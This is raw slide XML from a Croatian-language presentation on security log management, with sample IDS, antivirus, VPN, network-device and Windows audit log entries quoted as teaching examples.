            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>Sigurnosni log zapisi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="sr-Latn-RS" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28675" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>IDS/IPS sustavi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>Detektiraju i sprječavaju neovlaštene aktivnosti</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="sr-Latn-RS" i="1" dirty="0"/>
              <a:t>08/22-12:40:45.777262  [**] [119:15:1] (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="sr-Latn-RS" i="1" dirty="0" err="1"/>
              <a:t>http_inspect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="sr-Latn-RS" i="1" dirty="0"/>
              <a:t>) OVERSIZE REQUEST-URI DIRECTORY [**] [Priority: 3] {TCP} 192.168.0.107:1381 -&gt; 192.168.0.13:80</a:t>
            </a:r>
            <a:endParaRPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>Antivirusni programi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0"/>
              <a:t>14.1.2010 12:19:01	Real-time file system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1"/>
              <a:t>protection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0"/>
              <a:t>	file	C:\Users\ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1"/>
              <a:t>Updated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0"/>
              <a:t> W-2.doc	Win32/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1"/>
              <a:t>Poison.NAE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1"/>
              <a:t>trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1"/>
              <a:t>cleaned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1"/>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1"/>
              <a:t>deleting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1"/>
              <a:t>quarantined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1"/>
              <a:t>xxxxxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0"/>
              <a:t>	Event </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1"/>
              <a:t>occurred</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0"/>
              <a:t> on a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1"/>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1"/>
              <a:t>created</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1"/>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1"/>
              <a:t>application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0"/>
              <a:t>: C:\Windows\System32\pscp.exe.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hr-HR" dirty="0" err="1"/>
              <a:t>Agenda</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15363" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>Osnovno o upravljanju log zapisima</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>SIEM rješenja</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>EDR </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>XDR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="hr-HR" altLang="sr-Latn-R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rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>Sigurnosni log zapisi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="sr-Latn-RS" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29699" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2000" dirty="0"/>
              <a:t>VPN sustavi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>loc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t>=1349093 filename=fw.log </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>fileid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t>=1263509940 time=15Jan2010 15:03:03 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>authcrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>orig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t>=fw1 i/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>f_dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>inbound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t> i/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>f_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>daemon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>has_accounting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t>=0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=192.168.1.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=fw1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=CN=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>korisnik,OU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>users,O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-manager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>reason</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t>:=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>Client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>Encryption</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>Authenticated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t> RSA Signature </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>scheme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t>:=IKE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>methods</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t>:=AES-256,IKE,SHA1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>fw_subproduct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t>=VPN-1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>vpn_feature_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>SecureClients</a:t>
            </a:r>
            <a:endParaRPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2000" dirty="0"/>
              <a:t>Mrežni uređaji</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t>Jan 14 13:10:02 10.0.0.1 935: 46w5d: %SYS-5-CONFIG_I: Configured from console by cisco on vty0 (10.0.0.1)</a:t>
            </a:r>
            <a:endParaRPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="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rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>Audit zapisi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="sr-Latn-RS" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30723" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>Windowsi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t>Event </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>Success</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t> Audit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t>Event </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>Source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>Security</a:t>
            </a:r>
            <a:endParaRPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t>Event </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>Category</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t>: (1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t>Event ID: 517</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t>Date: 3/6/2006</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t>Time: 2:56:40 PM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>User</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t>: NT AUTHORITY\SYSTEM </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t>Computer: KENT </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>Description</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t> audit log </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>was</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>cleared</a:t>
            </a:r>
